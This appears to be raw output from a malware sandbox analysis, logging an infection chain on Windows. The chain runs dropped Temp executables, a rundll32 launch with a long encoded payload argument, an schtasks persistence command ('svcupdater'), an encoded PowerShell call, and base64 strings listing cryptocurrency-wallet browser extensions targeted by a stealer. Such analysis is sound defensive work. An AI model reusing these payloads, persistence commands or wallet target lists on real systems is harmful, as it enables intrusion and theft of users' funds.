              Source: C:\Windows\SysWOW64\fontview.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Roaming\nsis_uns5aa2a3.dll",PrintUIEntry |5CQkOhmAAAA|1TKr5GsMwYD|67sDqg8OAAl|xYmwxC0TNSO|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8|AtBQPz8FP|AFoAeQBPAGL7AEEnAEMAaAA3|wBVAEsAZwBJ|i0CWUiD7CjoBP8CAABIg8Qow||MzMxMiUQkGP9IiVQkEEiJTPskCF0BSItEJDBvSIkEJIEBOEhvAL8ISMdEJBAtAet9DoEBEEiDwAGPAd0QgQFASDmWAHMl|p8DiwwkSAPISF+LwUiLTKsBVHsA|wPRSIvKigmI9wjrwWYFZUiLBPslYPPwM8lIi1D|GEg70XQ2SIP|wiBIiwJIO8L|dCpmg3hIGHX|GkyLQFBmQYPvOGt0BxERS3UI|hEQeBAudAVIi78A69VIi0j9AMH+agBAU1VWV0FUv0FVQVZBV10BZv+BOU1aTYv4TP+L8kiL2Q+F|P7z8ExjSTxBgTz|CVBFAAAPheq+8|BBi4QJiPPwhf|ASI08AQ+E1t5qEYO8CYwtAQ+E|cfz8ESLZyBEi|9fHIt3JESLT|8YTAPhTAPZSP8D8TPJRYXJD|uEpPPwTYvEQYv|EEUz0kgD04r|AoTAdB1BwcrvDQ++wPoAAUQD|dC|EXXsQYH6qv|8DXx0DoPBAf9Jg8AEQTvJc|9p68aLwQ+3DP9ORYssi0wD6+90WDPtqhB0UUH7ixTBANMzyYoCf0yLwusPwcnIEXsDyOUQAUGKANUQ|+0zwDP2QTsM+bbgEKYAg8YBg|j|CHLu6wpIi8v|Qf|VSYkE94P9xeQQxAQ7bxhy|a9mAUFfQV5BXb9BXF9eXVszF0jvgexgAWQAi+no|2b+||9IhcAPW4SYdSBMja8BiysQ38gz|+ibfSCNX|8ETI1FRjPSi9|L|1QkaIAgTIuv4A+Ea3UgRagQM|fAi9ORIEiJfCT1IKYgcIAgSIvwD|OES3UgpiBQSI1W|whEjUdASI2M|SSFEUiL2Oh8|a5+II1WSN4gEOIhzPbz8Ohn7yBEiwaN01cIQSCmIFjKIYmEaySAhxLe8|CLDtogj1iJjCRxEQcwkSDo7THvIIucLTJMi12|OkiD+2xIiiAw|0yJZCQ4TIuk7hoyTIlchAGEJNy2hxGGko0RjUdLMIz7JPDz8EmL1Ojp7fwFMIqceDJIjYT+eDJBgPMhjU9s90QwGKQCg+kBdffzgbx4MiFSZXi|dU2LhCT0IjGU+yT4NQHCSDvYcv84g|psdjNEjXtJQPoAlEG4AJgAeqYgQMoi+HQZRLYwvsAxSY1UJGyRIEnfg+hs6GuCMEiL|c6mIHhIhf90Es+LVUJMjjAbMUiN|0wkQP|XSIHEAHQhYSQtCC0B
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\dllhost.exe
              Source: C:\Users\user\AppData\Local\Temp\336E.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe
              Source: C:\Windows\System32\dllhost.exeProcess created: C:\Users\user\AppData\Local\Temp\Library.exe "C:\Users\user\AppData\Local\Temp\Library.exe"
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5980 -s 648
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAOQAwAA==
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\336E.exe C:\Users\user\AppData\Local\Temp\336E.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\2560.exe C:\Users\user\AppData\Local\Temp\2560.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\226F.exe C:\Users\user\AppData\Local\Temp\226F.exe
              Source: C:\Users\user\AppData\Local\Temp\336E.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
              Source: C:\Users\user\AppData\Local\Temp\2560.exeProcess created: C:\Users\user\AppData\Local\Temp\2560.exe C:\Users\user\AppData\Local\Temp\2560.exe
              Source: C:\Users\user\AppData\Local\Temp\226F.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
              Source: C:\Users\user\AppData\Local\Temp\226F.exeProcess created: C:\Windows\SysWOW64\fontview.exe C:\Windows\SYSWOW64\fontview.exe
              Source: C:\Windows\SysWOW64\fontview.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Roaming\nsis_uns5aa2a3.dll",PrintUIEntry |5CQkOhmAAAA|1TKr5GsMwYD|67sDqg8OAAl|xYmwxC0TNSO|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8|AtBQPz8FP|AFoAeQBPAGL7AEEnAEMAaAA3|wBVAEsAZwBJ|i0CWUiD7CjoBP8CAABIg8Qow||MzMxMiUQkGP9IiVQkEEiJTPskCF0BSItEJDBvSIkEJIEBOEhvAL8ISMdEJBAtAet9DoEBEEiDwAGPAd0QgQFASDmWAHMl|p8DiwwkSAPISF+LwUiLTKsBVHsA|wPRSIvKigmI9wjrwWYFZUiLBPslYPPwM8lIi1D|GEg70XQ2SIP|wiBIiwJIO8L|dCpmg3hIGHX|GkyLQFBmQYPvOGt0BxERS3UI|hEQeBAudAVIi78A69VIi0j9AMH+agBAU1VWV0FUv0FVQVZBV10BZv+BOU1aTYv4TP+L8kiL2Q+F|P7z8ExjSTxBgTz|CVBFAAAPheq+8|BBi4QJiPPwhf|ASI08AQ+E1t5qEYO8CYwtAQ+E|cfz8ESLZyBEi|9fHIt3JESLT|8YTAPhTAPZSP8D8TPJRYXJD|uEpPPwTYvEQYv|EEUz0kgD04r|AoTAdB1BwcrvDQ++wPoAAUQD|dC|EXXsQYH6qv|8DXx0DoPBAf9Jg8AEQTvJc|9p68aLwQ+3DP9ORYssi0wD6+90WDPtqhB0UUH7ixTBANMzyYoCf0yLwusPwcnIEXsDyOUQAUGKANUQ|+0zwDP2QTsM+bbgEKYAg8YBg|j|CHLu6wpIi8v|Qf|VSYkE94P9xeQQxAQ7bxhy|a9mAUFfQV5BXb9BXF9eXVszF0jvgexgAWQAi+no|2b+||9IhcAPW4SYdSBMja8BiysQ38gz|+ibfSCNX|8ETI1FRjPSi9|L|1QkaIAgTIuv4A+Ea3UgRagQM|fAi9ORIEiJfCT1IKYgcIAgSIvwD|OES3UgpiBQSI1W|whEjUdASI2M|SSFEUiL2Oh8|a5+II1WSN4gEOIhzPbz8Ohn7yBEiwaN01cIQSCmIFjKIYmEaySAhxLe8|CLDtogj1iJjCRxEQcwkSDo7THvIIucLTJMi12|OkiD+2xIiiAw|0yJZCQ4TIuk7hoyTIlchAGEJNy2hxGGko0RjUdLMIz7JPDz8EmL1Ojp7fwFMIqceDJIjYT+eDJBgPMhjU9s90QwGKQCg+kBdffzgbx4MiFSZXi|dU2LhCT0IjGU+yT4NQHCSDvYcv84g|psdjNEjXtJQPoAlEG4AJgAeqYgQMoi+HQZRLYwvsAxSY1UJGyRIEnfg+hs6GuCMEiL|c6mIHhIhf90Es+LVUJMjjAbMUiN|0wkQP|XSIHEAHQhYSQtCC0B
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\dllhost.exe
              Source: C:\Windows\System32\dllhost.exeProcess created: C:\Users\user\AppData\Local\Temp\Library.exe "C:\Users\user\AppData\Local\Temp\Library.exe"
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAOQAwAA==
              Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0bf754aa-c967-445c-ab3d-d8fda9bae7ef}\InProcServer32
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\SysWOW64\fontview.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\SysWOW64\fontview.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\336E.tmpJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\System32\dllhost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Local\Temp\Library.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
              Source: C:\Windows\SysWOW64\fontview.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Roaming\nsis_uns5aa2a3.dll",PrintUIEntry |5CQkOhmAAAA|1TKr5GsMwYD|67sDqg8OAAl|xYmwxC0TNSO|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8|AtBQPz8FP|AFoAeQBPAGL7AEEnAEMAaAA3|wBVAEsAZwBJ|i0CWUiD7CjoBP8CAABIg8Qow||MzMxMiUQkGP9IiVQkEEiJTPskCF0BSItEJDBvSIkEJIEBOEhvAL8ISMdEJBAtAet9DoEBEEiDwAGPAd0QgQFASDmWAHMl|p8DiwwkSAPISF+LwUiLTKsBVHsA|wPRSIvKigmI9wjrwWYFZUiLBPslYPPwM8lIi1D|GEg70XQ2SIP|wiBIiwJIO8L|dCpmg3hIGHX|GkyLQFBmQYPvOGt0BxERS3UI|hEQeBAudAVIi78A69VIi0j9AMH+agBAU1VWV0FUv0FVQVZBV10BZv+BOU1aTYv4TP+L8kiL2Q+F|P7z8ExjSTxBgTz|CVBFAAAPheq+8|BBi4QJiPPwhf|ASI08AQ+E1t5qEYO8CYwtAQ+E|cfz8ESLZyBEi|9fHIt3JESLT|8YTAPhTAPZSP8D8TPJRYXJD|uEpPPwTYvEQYv|EEUz0kgD04r|AoTAdB1BwcrvDQ++wPoAAUQD|dC|EXXsQYH6qv|8DXx0DoPBAf9Jg8AEQTvJc|9p68aLwQ+3DP9ORYssi0wD6+90WDPtqhB0UUH7ixTBANMzyYoCf0yLwusPwcnIEXsDyOUQAUGKANUQ|+0zwDP2QTsM+bbgEKYAg8YBg|j|CHLu6wpIi8v|Qf|VSYkE94P9xeQQxAQ7bxhy|a9mAUFfQV5BXb9BXF9eXVszF0jvgexgAWQAi+no|2b+||9IhcAPW4SYdSBMja8BiysQ38gz|+ibfSCNX|8ETI1FRjPSi9|L|1QkaIAgTIuv4A+Ea3UgRagQM|fAi9ORIEiJfCT1IKYgcIAgSIvwD|OES3UgpiBQSI1W|whEjUdASI2M|SSFEUiL2Oh8|a5+II1WSN4gEOIhzPbz8Ohn7yBEiwaN01cIQSCmIFjKIYmEaySAhxLe8|CLDtogj1iJjCRxEQcwkSDo7THvIIucLTJMi12|OkiD+2xIiiAw|0yJZCQ4TIuk7hoyTIlchAGEJNy2hxGGko0RjUdLMIz7JPDz8EmL1Ojp7fwFMIqceDJIjYT+eDJBgPMhjU9s90QwGKQCg+kBdffzgbx4MiFSZXi|dU2LhCT0IjGU+yT4NQHCSDvYcv84g|psdjNEjXtJQPoAlEG4AJgAeqYgQMoi+HQZRLYwvsAxSY1UJGyRIEnfg+hs6GuCMEiL|c6mIHhIhf90Es+LVUJMjjAbMUiN|0wkQP|XSIHEAHQhYSQtCC0B
              Source: 16.3.226F.exe.d030000.1.unpack, BrEx.csBase64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
              Source: 16.3.226F.exe.d030000.0.unpack, BrEx.csBase64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
              Source: 18.2.ngentask.exe.400000.0.unpack, BrEx.csBase64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZ